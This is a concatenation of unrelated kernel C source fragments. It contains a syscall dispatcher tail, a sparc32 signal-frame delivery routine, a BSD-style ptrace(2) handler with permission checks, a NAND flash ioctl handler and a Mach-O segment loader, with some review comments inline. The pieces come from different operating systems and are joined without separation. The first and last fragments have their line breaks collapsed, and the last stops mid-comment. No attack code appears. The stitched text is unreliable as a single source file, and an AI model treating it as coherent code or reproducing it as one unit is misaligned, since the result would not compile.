AARG(char *, pValue, 2, uarg[3]); usys_getproperty( &err, u, uarg[0], pName, pValue, uarg[3] ); ret = err; } break; case SYS_listproperties: { AARG(char *, buf, 2, uarg[3]); usys_listproperties( &err, u, uarg[0], uarg[1], buf, uarg[3] ); ret = err; } break; case SYS_name2ip: { AARG(in_addr_t *, out, 0, sizeof(in_addr_t)); AARG(const char *, name, 1, 1); ret = name2ip( out, name, uarg[2] ); if( ret != 0 ) err = ret; } break; case SYS_sigpending: { AARG(sigset_t *, set, 0, sizeof(sigset_t *)); ret = usys_sigpending( &err, u, set); break; } case SYS_signal: { #if 0 AARG(sighandler_t, hand, 1, sizeof(sighandler_t)); hand = usys_signal( &err, u, uarg[0], hand); // FIXME 64 bit error ret = ((int)hand) - mina; // Convert pointer back #else // We do not use pointer (ret and uarg 1), so we don't have to convert it ret = (int)usys_signal( &err, u, uarg[0], (void *)uarg[1]); #endif break; } case SYS_sigprocmask: //case raise: case SYS_sigaction: case SYS_siginterrupt: case SYS_sigsuspend: goto unimpl; unimpl: SHOW_ERROR( 0, "Unimplemented syscall %d called", callno ); err = ENOSYS; break; default: SHOW_ERROR( 0, "Unknown syscall %d called", callno ); err = ENOSYS; break; } #else // HAVE_UNIX int err = ENOSYS; int ret = -1; goto err_ret; // to clear warning #endif // HAVE_UNIX err_ret: #ifdef ARCH_ia32 #define _RET_OK st->eax = ret; st->edx = err; #endif #ifdef ARCH_mips #define _RET_OK st->r2 = ret; // v0 (normal ret register, low) st->r3 = err; // v1 (normal ret register, hi) #endif #ifdef ARCH_arm #define _RET_OK st->r0 = ret; // normal ret register st->r1 = err; // arg1 reg, we can safely use for return of errno #endif #ifndef _RET_OK #error arch ret #endif }
/*
 * Deliver a signal to a 32-bit (sparc32) process using the old
 * sigcontext ABI: build a signal frame in kernel space, copy it onto the
 * user stack (or the alternate signal stack), and rewrite the trapframe
 * so the process resumes in the signal trampoline with the handler
 * address in %g1.  Called with p->p_lock held.
 */
static void
netbsd32_sendsig_sigcontext(const ksiginfo_t *ksi, const sigset_t *mask)
{
	int sig = ksi->ksi_signo;
	struct lwp *l = curlwp;
	struct proc *p = l->l_proc;
	struct sparc32_sigframe *fp;
	struct trapframe64 *tf;
	int addr, onstack, error;
	struct rwindow32 *oldsp, *newsp;
	sig_t catcher = SIGACTION(p, sig).sa_handler;
	struct sparc32_sigframe sf;
	extern char netbsd32_sigcode[], netbsd32_esigcode[];
#define szsigcode	(netbsd32_esigcode - netbsd32_sigcode)

	tf = l->l_md.md_tf;
	/* Need to attempt to zero extend this 32-bit pointer */
	oldsp = (struct rwindow32 *)(u_long)(u_int)tf->tf_out[6];
	/* Do we need to jump onto the signal stack? */
	onstack =
	    (l->l_sigstk.ss_flags & (SS_DISABLE | SS_ONSTACK)) == 0 &&
	    (SIGACTION(p, sig).sa_flags & SA_ONSTACK) != 0;
	if (onstack) {
		fp = (struct sparc32_sigframe *)((char *)l->l_sigstk.ss_sp +
		    l->l_sigstk.ss_size);
		l->l_sigstk.ss_flags |= SS_ONSTACK;
	} else
		fp = (struct sparc32_sigframe *)oldsp;
	/* Allocate the frame just below fp, 8-byte aligned for SPARC. */
	fp = (struct sparc32_sigframe *)((u_long)(fp - 1) & ~7);

#ifdef DEBUG
	/* NOTE(review): sigpid is assigned immediately above the test, so
	 * the "p->p_pid == sigpid" comparison here is always true. */
	sigpid = p->p_pid;
	if ((sigdebug & SDB_KSTACK) && p->p_pid == sigpid) {
		printf("sendsig: %s[%d] sig %d newusp %p scp %p oldsp %p\n",
		    p->p_comm, p->p_pid, sig, fp, &fp->sf_sc, oldsp);
		if (sigdebug & SDB_DDB)
			Debugger();
	}
#endif

	/*
	 * Now set up the signal frame. We build it in kernel space
	 * and then copy it out. We probably ought to just build it
	 * directly in user space....
	 */
	sf.sf_signo = sig;
	sf.sf_code = (u_int)ksi->ksi_trap;
#if defined(COMPAT_SUNOS) || defined(MODULAR)
	sf.sf_scp = (u_long)&fp->sf_sc;
#endif
	sf.sf_addr = 0;			/* XXX */

	/*
	 * Build the signal context to be used by sigreturn.
	 */
	sf.sf_sc.sc_onstack = onstack;
	sf.sf_sc.sc_mask = *mask;
	sf.sf_sc.sc_sp = (u_long)oldsp;
	sf.sf_sc.sc_pc = tf->tf_pc;
	sf.sf_sc.sc_npc = tf->tf_npc;
	sf.sf_sc.sc_psr = TSTATECCR_TO_PSR(tf->tf_tstate); /* XXX */
	sf.sf_sc.sc_g1 = tf->tf_global[1];
	sf.sf_sc.sc_o0 = tf->tf_out[0];

	/*
	 * Put the stack in a consistent state before we whack away
	 * at it.  Note that write_user_windows may just dump the
	 * registers into the pcb; we need them in the process's memory.
	 * We also need to make sure that when we start the signal handler,
	 * its %i6 (%fp), which is loaded from the newly allocated stack area,
	 * joins seamlessly with the frame it was in when the signal occurred,
	 * so that the debugger and _longjmp code can back up through it.
	 */
	sendsig_reset(l, sig);
	mutex_exit(p->p_lock);
	newsp = (struct rwindow32 *)((long)fp - sizeof(struct rwindow32));
	write_user_windows();
#ifdef DEBUG
	if ((sigdebug & SDB_KSTACK))
	    printf("sendsig: saving sf to %p, setting stack pointer %p to %p\n",
		   fp, &(((struct rwindow32 *)newsp)->rw_in[6]), oldsp);
#endif
	/* All three steps must succeed; any fault means the user stack is
	 * unusable for signal delivery. */
	error = (rwindow_save(l) ||
	    copyout((void *)&sf, (void *)fp, sizeof sf) ||
	    suword(&(((struct rwindow32 *)newsp)->rw_in[6]), (u_long)oldsp));
	mutex_enter(p->p_lock);
	if (error) {
		/*
		 * Process has trashed its stack; give it an illegal
		 * instruction to halt it in its tracks.
		 */
#ifdef DEBUG
		mutex_exit(p->p_lock);
		if ((sigdebug & SDB_KSTACK) && p->p_pid == sigpid)
			printf("sendsig: window save or copyout error\n");
		printf("sendsig: stack was trashed trying to send sig %d, sending SIGILL\n", sig);
		if (sigdebug & SDB_DDB)
			Debugger();
		mutex_enter(p->p_lock);
#endif
		sigexit(l, SIGILL);
		/* NOTREACHED */
	}

#ifdef DEBUG
	if (sigdebug & SDB_FOLLOW) {
		printf("sendsig: %s[%d] sig %d scp %p\n",
		       p->p_comm, p->p_pid, sig, &fp->sf_sc);
	}
#endif

	/*
	 * Arrange to continue execution at the code copied out in exec().
	 * It needs the function to call in %g1, and a new stack pointer.
	 */
	/* NOTE(review): addr is a plain int holding a user VA; this assumes
	 * the 32-bit process's trampoline address fits in 32 bits — confirm. */
	addr = p->p_psstrp - szsigcode;
	tf->tf_global[1] = (long)catcher;
	tf->tf_pc = addr;
	tf->tf_npc = addr + 4;
	tf->tf_out[6] = (uint64_t)(u_int)(u_long)newsp;

	/* Remember that we're now on the signal stack. */
	if (onstack)
		l->l_sigstk.ss_flags |= SS_ONSTACK;
#ifdef DEBUG
	if ((sigdebug & SDB_KSTACK) && p->p_pid == sigpid) {
		mutex_exit(p->p_lock);
		printf("sendsig: about to return to catcher %p thru %p\n",
		       catcher, addr);
		if (sigdebug & SDB_DDB)
			Debugger();
		mutex_enter(p->p_lock);
	}
#endif
}
/*
 * Process debugging system call.
 *
 * Dispatches a ptrace(2) request against a target thread 't' and its
 * process 'tr' in three phases: (1) resolve the target from the pid (or
 * tid for per-thread requests), (2) validate permissions/state for the
 * request, (3) perform the operation.  Returns 0 or an errno.
 */
int
sys_ptrace(struct proc *p, void *v, register_t *retval)
{
	struct sys_ptrace_args /* {
		syscallarg(int) req;
		syscallarg(pid_t) pid;
		syscallarg(caddr_t) addr;
		syscallarg(int) data;
	} */ *uap = v;
	struct proc *t;				/* target thread */
	struct process *tr;			/* target process */
	struct uio uio;
	struct iovec iov;
	struct ptrace_io_desc piod;
	struct ptrace_event pe;
	struct ptrace_thread_state pts;
	struct reg *regs;
#if defined (PT_SETFPREGS) || defined (PT_GETFPREGS)
	struct fpreg *fpregs;
#endif
#if defined (PT_SETXMMREGS) || defined (PT_GETXMMREGS)
	struct xmmregs *xmmregs;
#endif
	int error, write;
	int temp;
	int req = SCARG(uap, req);
	int s;

	/* "A foolish consistency..." XXX */
	/* Phase 1: resolve the target thread from pid (or pid+offset tid). */
	switch (req) {
	case PT_TRACE_ME:
		t = p;
		break;

	/* calls that only operate on the PID */
	case PT_READ_I:
	case PT_READ_D:
	case PT_WRITE_I:
	case PT_WRITE_D:
	case PT_KILL:
	case PT_ATTACH:
	case PT_IO:
	case PT_SET_EVENT_MASK:
	case PT_GET_EVENT_MASK:
	case PT_GET_PROCESS_STATE:
	case PT_GET_THREAD_FIRST:
	case PT_GET_THREAD_NEXT:
	default:
		/* Find the process we're supposed to be operating on. */
		if ((t = pfind(SCARG(uap, pid))) == NULL)
			return (ESRCH);
		if (t->p_flag & P_THREAD)
			return (ESRCH);
		break;

	/* calls that accept a PID or a thread ID */
	case PT_CONTINUE:
	case PT_DETACH:
#ifdef PT_STEP
	case PT_STEP:
#endif
	case PT_GETREGS:
	case PT_SETREGS:
#ifdef PT_GETFPREGS
	case PT_GETFPREGS:
#endif
#ifdef PT_SETFPREGS
	case PT_SETFPREGS:
#endif
#ifdef PT_GETXMMREGS
	case PT_GETXMMREGS:
#endif
#ifdef PT_SETXMMREGS
	case PT_SETXMMREGS:
#endif
		if (SCARG(uap, pid) > THREAD_PID_OFFSET) {
			/* tid: look up the thread directly. */
			t = pfind(SCARG(uap, pid) - THREAD_PID_OFFSET);
			if (t == NULL)
				return (ESRCH);
		} else {
			if ((t = pfind(SCARG(uap, pid))) == NULL)
				return (ESRCH);
			if (t->p_flag & P_THREAD)
				return (ESRCH);
		}
		break;
	}
	tr = t->p_p;

	/* Racing an execve() would let us see an inconsistent image. */
	if ((tr->ps_flags & PS_INEXEC) != 0)
		return (EAGAIN);

	/* Phase 2: make sure we can operate on it. */
	switch (req) {
	case PT_TRACE_ME:
		/* Saying that you're being traced is always legal. */
		break;

	case PT_ATTACH:
		/*
		 * You can't attach to a process if:
		 *	(1) it's the process that's doing the attaching,
		 */
		if (tr == p->p_p)
			return (EINVAL);

		/*
		 *	(2) it's a system process
		 */
		if (ISSET(t->p_flag, P_SYSTEM))
			return (EPERM);

		/*
		 *	(3) it's already being traced, or
		 */
		if (ISSET(tr->ps_flags, PS_TRACED))
			return (EBUSY);

		/*
		 *	(4) it's not owned by you, or the last exec
		 *	    gave us setuid/setgid privs (unless
		 *	    you're root), or...
		 *
		 *      [Note: once PS_SUGID or PS_SUGIDEXEC gets set in
		 *	execve(), they stay set until the process does
		 *	another execve(). Hence this prevents a setuid
		 *	process which revokes its special privileges using
		 *	setuid() from being traced. This is good security.]
		 */
		if ((tr->ps_ucred->cr_ruid != p->p_ucred->cr_ruid ||
		    ISSET(tr->ps_flags, PS_SUGIDEXEC | PS_SUGID)) &&
		    (error = suser(p, 0)) != 0)
			return (error);

		/*
		 *	(5) ...it's init, which controls the security level
		 *	    of the entire system, and the system was not
		 *	    compiled with permanently insecure mode turned
		 *	    on.
		 */
		if ((tr->ps_pid == 1) && (securelevel > -1))
			return (EPERM);

		/*
		 *	(6) it's an ancestor of the current process and
		 *	    not init (because that would create a loop in
		 *	    the process graph).
		 */
		if (tr->ps_pid != 1 && inferior(p->p_p, tr))
			return (EINVAL);
		break;

	case PT_READ_I:
	case PT_READ_D:
	case PT_WRITE_I:
	case PT_WRITE_D:
	case PT_IO:
	case PT_CONTINUE:
	case PT_KILL:
	case PT_DETACH:
#ifdef PT_STEP
	case PT_STEP:
#endif
	case PT_SET_EVENT_MASK:
	case PT_GET_EVENT_MASK:
	case PT_GET_PROCESS_STATE:
	case PT_GETREGS:
	case PT_SETREGS:
#ifdef PT_GETFPREGS
	case PT_GETFPREGS:
#endif
#ifdef PT_SETFPREGS
	case PT_SETFPREGS:
#endif
#ifdef PT_GETXMMREGS
	case PT_GETXMMREGS:
#endif
#ifdef PT_SETXMMREGS
	case PT_SETXMMREGS:
#endif
		/*
		 * You can't do what you want to the process if:
		 *	(1) It's not being traced at all,
		 */
		if (!ISSET(tr->ps_flags, PS_TRACED))
			return (EPERM);

		/*
		 *	(2) it's not being traced by _you_, or
		 */
		if (tr->ps_pptr != p->p_p)
			return (EBUSY);

		/*
		 *	(3) it's not currently stopped.
		 */
		if (t->p_stat != SSTOP || !ISSET(tr->ps_flags, PS_WAITED))
			return (EBUSY);
		break;

	case PT_GET_THREAD_FIRST:
	case PT_GET_THREAD_NEXT:
		/*
		 * You can't do what you want to the process if:
		 *	(1) It's not being traced at all,
		 */
		if (!ISSET(tr->ps_flags, PS_TRACED))
			return (EPERM);

		/*
		 *	(2) it's not being traced by _you_, or
		 */
		if (tr->ps_pptr != p->p_p)
			return (EBUSY);

		/*
		 * Do the work here because the request isn't actually
		 * associated with 't'
		 */
		if (SCARG(uap, data) != sizeof(pts))
			return (EINVAL);

		if (req == PT_GET_THREAD_NEXT) {
			error = copyin(SCARG(uap, addr), &pts, sizeof(pts));
			if (error)
				return (error);
			t = pfind(pts.pts_tid - THREAD_PID_OFFSET);
			if (t == NULL || ISSET(t->p_flag, P_WEXIT))
				return (ESRCH);
			if (t->p_p != tr)
				return (EINVAL);
			t = TAILQ_NEXT(t, p_thr_link);
		} else {
			t = TAILQ_FIRST(&tr->ps_threads);
		}

		/* pts_tid == -1 signals "no more threads" to the caller. */
		if (t == NULL)
			pts.pts_tid = -1;
		else
			pts.pts_tid = t->p_pid + THREAD_PID_OFFSET;
		return (copyout(&pts, SCARG(uap, addr), sizeof(pts)));

	default:			/* It was not a legal request. */
		return (EINVAL);
	}

	/* Do single-step fixup if needed. */
	FIX_SSTEP(t);

	/* Phase 3: now do the operation. */
	write = 0;
	*retval = 0;

	switch (req) {
	case PT_TRACE_ME:
		/* Just set the trace flag. */
		atomic_setbits_int(&tr->ps_flags, PS_TRACED);
		tr->ps_oppid = tr->ps_pptr->ps_pid;
		if (tr->ps_ptstat == NULL)
			tr->ps_ptstat = malloc(sizeof(*tr->ps_ptstat),
			    M_SUBPROC, M_WAITOK);
		memset(tr->ps_ptstat, 0, sizeof(*tr->ps_ptstat));
		return (0);

	case PT_WRITE_I:		/* XXX no separate I and D spaces */
	case PT_WRITE_D:
		write = 1;
		temp = SCARG(uap, data);
		/* FALLTHROUGH */
	case PT_READ_I:		/* XXX no separate I and D spaces */
	case PT_READ_D:
		/* write = 0 done above. */
		/* Move one int between the tracee and 'temp' via uiomove. */
		iov.iov_base = (caddr_t)&temp;
		iov.iov_len = sizeof(int);
		uio.uio_iov = &iov;
		uio.uio_iovcnt = 1;
		uio.uio_offset = (off_t)(vaddr_t)SCARG(uap, addr);
		uio.uio_resid = sizeof(int);
		uio.uio_segflg = UIO_SYSSPACE;
		uio.uio_rw = write ? UIO_WRITE : UIO_READ;
		uio.uio_procp = p;
		error = process_domem(p, t, &uio, write ? PT_WRITE_I :
		    PT_READ_I);
		if (write == 0)
			*retval = temp;
		return (error);

	case PT_IO:
		error = copyin(SCARG(uap, addr), &piod, sizeof(piod));
		if (error)
			return (error);
		iov.iov_base = piod.piod_addr;
		iov.iov_len = piod.piod_len;
		uio.uio_iov = &iov;
		uio.uio_iovcnt = 1;
		uio.uio_offset = (off_t)(vaddr_t)piod.piod_offs;
		uio.uio_resid = piod.piod_len;
		uio.uio_segflg = UIO_USERSPACE;
		uio.uio_procp = p;
		switch (piod.piod_op) {
		case PIOD_READ_I:
			req = PT_READ_I;
			uio.uio_rw = UIO_READ;
			break;
		case PIOD_READ_D:
			req = PT_READ_D;
			uio.uio_rw = UIO_READ;
			break;
		case PIOD_WRITE_I:
			req = PT_WRITE_I;
			uio.uio_rw = UIO_WRITE;
			break;
		case PIOD_WRITE_D:
			req = PT_WRITE_D;
			uio.uio_rw = UIO_WRITE;
			break;
		case PIOD_READ_AUXV:
			req = PT_READ_D;
			uio.uio_rw = UIO_READ;
			/* Clamp the transfer to the emulation's auxv size. */
			temp = tr->ps_emul->e_arglen * sizeof(char *);
			if (uio.uio_offset > temp)
				return (EIO);
			if (uio.uio_resid > temp - uio.uio_offset)
				uio.uio_resid = temp - uio.uio_offset;
			piod.piod_len = iov.iov_len = uio.uio_resid;
			error = process_auxv_offset(p, t, &uio);
			if (error)
				return (error);
			break;
		default:
			return (EINVAL);
		}
		error = process_domem(p, t, &uio, req);
		piod.piod_len -= uio.uio_resid;
		/* Best-effort writeback of the actual transfer length. */
		(void) copyout(&piod, SCARG(uap, addr), sizeof(piod));
		return (error);

#ifdef PT_STEP
	case PT_STEP:
		/*
		 * From the 4.4BSD PRM:
		 * "Execution continues as in request PT_CONTINUE; however
		 * as soon as possible after execution of at least one
		 * instruction, execution stops again. [ ... ]"
		 */
#endif
	case PT_CONTINUE:
		/*
		 * From the 4.4BSD PRM:
		 * "The data argument is taken as a signal number and the
		 * child's execution continues at location addr as if it
		 * incurred that signal. Normally the signal number will
		 * be either 0 to indicate that the signal that caused the
		 * stop should be ignored, or that value fetched out of
		 * the process's image indicating which signal caused
		 * the stop. If addr is (int *)1 then execution continues
		 * from where it stopped."
		 */
		if (SCARG(uap, pid) < THREAD_PID_OFFSET && tr->ps_single)
			t = tr->ps_single;

		/* Check that the data is a valid signal number or zero. */
		if (SCARG(uap, data) < 0 || SCARG(uap, data) >= NSIG)
			return (EINVAL);

		/* If the address parameter is not (int *)1, set the pc. */
		if ((int *)SCARG(uap, addr) != (int *)1)
			if ((error = process_set_pc(t, SCARG(uap, addr))) != 0)
				goto relebad;

#ifdef PT_STEP
		/*
		 * Arrange for a single-step, if that's requested and possible.
		 */
		error = process_sstep(t, req == PT_STEP);
		if (error)
			goto relebad;
#endif
		goto sendsig;

	case PT_DETACH:
		/*
		 * From the 4.4BSD PRM:
		 * "The data argument is taken as a signal number and the
		 * child's execution continues at location addr as if it
		 * incurred that signal. Normally the signal number will
		 * be either 0 to indicate that the signal that caused the
		 * stop should be ignored, or that value fetched out of
		 * the process's image indicating which signal caused
		 * the stop. If addr is (int *)1 then execution continues
		 * from where it stopped."
		 */
		if (SCARG(uap, pid) < THREAD_PID_OFFSET && tr->ps_single)
			t = tr->ps_single;

		/* Check that the data is a valid signal number or zero. */
		if (SCARG(uap, data) < 0 || SCARG(uap, data) >= NSIG)
			return (EINVAL);

#ifdef PT_STEP
		/*
		 * Arrange for a single-step, if that's requested and possible.
		 */
		error = process_sstep(t, req == PT_STEP);
		if (error)
			goto relebad;
#endif

		/* give process back to original parent or init */
		if (tr->ps_oppid != tr->ps_pptr->ps_pid) {
			struct process *ppr;

			ppr = prfind(tr->ps_oppid);
			proc_reparent(tr, ppr ? ppr : initproc->p_p);
		}

		/* not being traced any more */
		tr->ps_oppid = 0;
		atomic_clearbits_int(&tr->ps_flags, PS_TRACED|PS_WAITED);

	sendsig:
		memset(tr->ps_ptstat, 0, sizeof(*tr->ps_ptstat));

		/* Finally, deliver the requested signal (or none). */
		if (t->p_stat == SSTOP) {
			t->p_xstat = SCARG(uap, data);
			SCHED_LOCK(s);
			setrunnable(t);
			SCHED_UNLOCK(s);
		} else {
			if (SCARG(uap, data) != 0)
				psignal(t, SCARG(uap, data));
		}
		return (0);

	relebad:
		return (error);

	case PT_KILL:
		if (SCARG(uap, pid) < THREAD_PID_OFFSET && tr->ps_single)
			t = tr->ps_single;

		/* just send the process a KILL signal. */
		SCARG(uap, data) = SIGKILL;
		goto sendsig;	/* in PT_CONTINUE, above. */

	case PT_ATTACH:
		/*
		 * Go ahead and set the trace flag.
		 * Save the old parent (it's reset in
		 *   _DETACH, and also in kern_exit.c:wait4()
		 * Reparent the process so that the tracing
		 *   proc gets to see all the action.
		 * Stop the target.
		 */
		atomic_setbits_int(&tr->ps_flags, PS_TRACED);
		tr->ps_oppid = tr->ps_pptr->ps_pid;
		if (tr->ps_pptr != p->p_p)
			proc_reparent(tr, p->p_p);
		if (tr->ps_ptstat == NULL)
			tr->ps_ptstat = malloc(sizeof(*tr->ps_ptstat),
			    M_SUBPROC, M_WAITOK);
		SCARG(uap, data) = SIGSTOP;
		goto sendsig;

	case PT_GET_EVENT_MASK:
		if (SCARG(uap, data) != sizeof(pe))
			return (EINVAL);
		memset(&pe, 0, sizeof(pe));
		pe.pe_set_event = tr->ps_ptmask;
		return (copyout(&pe, SCARG(uap, addr), sizeof(pe)));

	case PT_SET_EVENT_MASK:
		if (SCARG(uap, data) != sizeof(pe))
			return (EINVAL);
		if ((error = copyin(SCARG(uap, addr), &pe, sizeof(pe))))
			return (error);
		tr->ps_ptmask = pe.pe_set_event;
		return (0);

	case PT_GET_PROCESS_STATE:
		if (SCARG(uap, data) != sizeof(*tr->ps_ptstat))
			return (EINVAL);
		if (tr->ps_single)
			tr->ps_ptstat->pe_tid =
			    tr->ps_single->p_pid + THREAD_PID_OFFSET;
		return (copyout(tr->ps_ptstat, SCARG(uap, addr),
		    sizeof(*tr->ps_ptstat)));

	case PT_SETREGS:
		KASSERT((p->p_flag & P_SYSTEM) == 0);
		if ((error = process_checkioperm(p, tr)) != 0)
			return (error);

		regs = malloc(sizeof(*regs), M_TEMP, M_WAITOK);
		error = copyin(SCARG(uap, addr), regs, sizeof(*regs));
		if (error == 0) {
			error = process_write_regs(t, regs);
		}
		free(regs, M_TEMP);
		return (error);

	case PT_GETREGS:
		KASSERT((p->p_flag & P_SYSTEM) == 0);
		if ((error = process_checkioperm(p, tr)) != 0)
			return (error);

		regs = malloc(sizeof(*regs), M_TEMP, M_WAITOK);
		error = process_read_regs(t, regs);
		if (error == 0)
			error = copyout(regs,
			    SCARG(uap, addr), sizeof (*regs));
		free(regs, M_TEMP);
		return (error);

#ifdef PT_SETFPREGS
	case PT_SETFPREGS:
		KASSERT((p->p_flag & P_SYSTEM) == 0);
		if ((error = process_checkioperm(p, tr)) != 0)
			return (error);

		fpregs = malloc(sizeof(*fpregs), M_TEMP, M_WAITOK);
		error = copyin(SCARG(uap, addr), fpregs, sizeof(*fpregs));
		if (error == 0) {
			error = process_write_fpregs(t, fpregs);
		}
		free(fpregs, M_TEMP);
		return (error);
#endif

#ifdef PT_GETFPREGS
	case PT_GETFPREGS:
		KASSERT((p->p_flag & P_SYSTEM) == 0);
		if ((error = process_checkioperm(p, tr)) != 0)
			return (error);

		fpregs = malloc(sizeof(*fpregs), M_TEMP, M_WAITOK);
		error = process_read_fpregs(t, fpregs);
		if (error == 0)
			error = copyout(fpregs,
			    SCARG(uap, addr), sizeof(*fpregs));
		free(fpregs, M_TEMP);
		return (error);
#endif

#ifdef PT_SETXMMREGS
	case PT_SETXMMREGS:
		KASSERT((p->p_flag & P_SYSTEM) == 0);
		if ((error = process_checkioperm(p, tr)) != 0)
			return (error);

		xmmregs = malloc(sizeof(*xmmregs), M_TEMP, M_WAITOK);
		error = copyin(SCARG(uap, addr), xmmregs, sizeof(*xmmregs));
		if (error == 0) {
			error = process_write_xmmregs(t, xmmregs);
		}
		free(xmmregs, M_TEMP);
		return (error);
#endif

#ifdef PT_GETXMMREGS
	case PT_GETXMMREGS:
		KASSERT((p->p_flag & P_SYSTEM) == 0);
		if ((error = process_checkioperm(p, tr)) != 0)
			return (error);

		xmmregs = malloc(sizeof(*xmmregs), M_TEMP, M_WAITOK);
		error = process_read_xmmregs(t, xmmregs);
		if (error == 0)
			error = copyout(xmmregs,
			    SCARG(uap, addr), sizeof(*xmmregs));
		free(xmmregs, M_TEMP);
		return (error);
#endif
	}

#ifdef DIAGNOSTIC
	panic("ptrace: impossible");
#endif
	return 0;
}
/*
 * Ioctl handler for the NAND character/disk interface.
 *
 * Supports block erase, OOB read/program, raw page read/program (via a
 * kernel bounce buffer), controller status and chip-parameter queries.
 * Returns 0 or an errno.
 *
 * Fix: the return values of copyin()/copyout() used for the raw
 * read/program paths were previously ignored, so a faulting user buffer
 * would program garbage into flash (RAW_PROG) or report success while
 * returning no data (RAW_READ).  They are now propagated to the caller.
 */
static int
nand_ioctl(struct disk *ndisk, u_long cmd, void *data, int fflag,
    struct thread *td)
{
	struct nand_chip *chip;
	struct nand_oob_rw *oob_rw = NULL;
	struct nand_raw_rw *raw_rw = NULL;
	device_t nandbus;
	uint8_t *buf = NULL;
	int ret = 0;
	uint8_t status;

	chip = (struct nand_chip *)ndisk->d_drv1;
	nandbus = device_get_parent(chip->dev);

	if ((cmd == NAND_IO_RAW_READ) || (cmd == NAND_IO_RAW_PROG)) {
		raw_rw = (struct nand_raw_rw *)data;
		/* NOTE(review): len is caller-controlled; consider bounding
		 * it against the chip geometry before allocating. */
		buf = malloc(raw_rw->len, M_NAND, M_WAITOK);
	}
	switch (cmd) {
	case NAND_IO_ERASE:
		ret = nand_erase_blocks(chip, ((off_t *)data)[0],
		    ((off_t *)data)[1]);
		break;
	case NAND_IO_OOB_READ:
		oob_rw = (struct nand_oob_rw *)data;
		ret = nand_oob_access(chip, oob_rw->page, 0,
		    oob_rw->len, oob_rw->data, 0);
		break;
	case NAND_IO_OOB_PROG:
		oob_rw = (struct nand_oob_rw *)data;
		ret = nand_oob_access(chip, oob_rw->page, 0,
		    oob_rw->len, oob_rw->data, 1);
		break;
	case NAND_IO_GET_STATUS:
		NANDBUS_LOCK(nandbus);
		ret = NANDBUS_GET_STATUS(nandbus, &status);
		if (ret == 0)
			*(uint8_t *)data = status;
		NANDBUS_UNLOCK(nandbus);
		break;
	case NAND_IO_RAW_PROG:
		/* Only program the flash if the user data arrived intact. */
		ret = copyin(raw_rw->data, buf, raw_rw->len);
		if (ret == 0)
			ret = nand_prog_pages_raw(chip, raw_rw->off, buf,
			    raw_rw->len);
		break;
	case NAND_IO_RAW_READ:
		ret = nand_read_pages_raw(chip, raw_rw->off, buf, raw_rw->len);
		/* Only report success if the data reached user space. */
		if (ret == 0)
			ret = copyout(buf, raw_rw->data, raw_rw->len);
		break;
	case NAND_IO_GET_CHIP_PARAM:
		nand_get_chip_param(chip, (struct chip_param_io *)data);
		break;
	default:
		printf("Unknown nand_ioctl request \n");
		ret = EIO;
	}

	if (buf)
		free(buf, M_NAND);

	return (ret);
}
static load_return_t load_segment( struct load_command *lcp, uint32_t filetype, void * control, off_t pager_offset, off_t macho_size, struct vnode *vp, vm_map_t map, int64_t slide, load_result_t *result ) { struct segment_command_64 segment_command, *scp; kern_return_t ret; vm_map_offset_t map_addr, map_offset; vm_map_size_t map_size, seg_size, delta_size; vm_prot_t initprot; vm_prot_t maxprot; size_t segment_command_size, total_section_size, single_section_size; boolean_t prohibit_pagezero_mapping = FALSE; if (LC_SEGMENT_64 == lcp->cmd) { segment_command_size = sizeof(struct segment_command_64); single_section_size = sizeof(struct section_64); } else { segment_command_size = sizeof(struct segment_command); single_section_size = sizeof(struct section); } if (lcp->cmdsize < segment_command_size) return (LOAD_BADMACHO); total_section_size = lcp->cmdsize - segment_command_size; if (LC_SEGMENT_64 == lcp->cmd) scp = (struct segment_command_64 *)lcp; else { scp = &segment_command; widen_segment_command((struct segment_command *)lcp, scp); } /* * Make sure what we get from the file is really ours (as specified * by macho_size). */ if (scp->fileoff + scp->filesize < scp->fileoff || scp->fileoff + scp->filesize > (uint64_t)macho_size) return (LOAD_BADMACHO); /* * Ensure that the number of sections specified would fit * within the load command size. */ if (total_section_size / single_section_size < scp->nsects) return (LOAD_BADMACHO); /* * Make sure the segment is page-aligned in the file. */ if ((scp->fileoff & PAGE_MASK_64) != 0) return (LOAD_BADMACHO); /* * Round sizes to page size. 
*/ seg_size = round_page_64(scp->vmsize); map_size = round_page_64(scp->filesize); map_addr = trunc_page_64(scp->vmaddr); /* JVXXX note that in XNU TOT this is round instead of trunc for 64 bits */ seg_size = vm_map_round_page(seg_size, vm_map_page_mask(map)); map_size = vm_map_round_page(map_size, vm_map_page_mask(map)); if (seg_size == 0) return (KERN_SUCCESS); if (map_addr == 0 && map_size == 0 && seg_size != 0 && (scp->initprot & VM_PROT_ALL) == VM_PROT_NONE && (scp->maxprot & VM_PROT_ALL) == VM_PROT_NONE) { /* * For PIE, extend page zero rather than moving it. Extending * page zero keeps early allocations from falling predictably * between the end of page zero and the beginning of the first * slid segment. */ seg_size += slide; slide = 0; /* XXX (4596982) this interferes with Rosetta, so limit to 64-bit tasks */ if (scp->cmd == LC_SEGMENT_64) { prohibit_pagezero_mapping = TRUE; } if (prohibit_pagezero_mapping) { /* * This is a "page zero" segment: it starts at address 0, * is not mapped from the binary file and is not accessible. * User-space should never be able to access that memory, so * make it completely off limits by raising the VM map's * minimum offset. */ ret = vm_map_raise_min_offset(map, seg_size); if (ret != KERN_SUCCESS) { return (LOAD_FAILURE); } return (LOAD_SUCCESS); } } /* If a non-zero slide was specified by the caller, apply now */ map_addr += slide; if (map_addr < result->min_vm_addr) result->min_vm_addr = map_addr; if (map_addr+seg_size > result->max_vm_addr) result->max_vm_addr = map_addr+seg_size; if (map == VM_MAP_NULL) return (LOAD_SUCCESS); map_offset = pager_offset + scp->fileoff; /* limited to 32 bits */ if (map_size > 0) { initprot = (scp->initprot) & VM_PROT_ALL; maxprot = (scp->maxprot) & VM_PROT_ALL; /* * Map a copy of the file into the address space. 
